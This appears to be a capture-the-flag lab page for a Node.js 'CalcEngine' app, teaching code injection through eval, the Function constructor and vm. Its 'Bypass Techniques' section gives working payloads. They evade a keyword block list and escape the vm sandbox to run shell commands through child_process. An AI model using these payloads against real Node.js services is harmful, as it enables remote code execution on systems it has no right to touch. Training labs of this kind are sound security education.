Code Injection

CalcEngine provides three endpoints that evaluate user input: eval(), Function(), and vm.runInNewContext(). All can be exploited for RCE. The flag is at /flag.txt.

Calculator (eval)

Blocked: require, process, child_process, exec, spawn, fs

Template (Function)

Sandbox (vm)

Bypass Techniques

# eval bypass (avoid blocked words):
this.constructor.constructor('return this')().constructor.constructor('return this')()['pro'+'cess']['mainM'+'odule']['req'+'uire']('child_'+'process')['ex'+'ecSync']('cat /flag.txt').toString()

# Function constructor:
${this.constructor.constructor('return global.process.mainModule.require("child_process").execSync("cat /flag.txt").toString()')()}

# VM escape:
this.constructor.constructor('return this')().process.mainModule.require('child_process').execSync('cat /flag.txt').toString()

Code Injection

Calculator (eval)

Template (Function)

Sandbox (vm)

Bypass Techniques

Submit Flag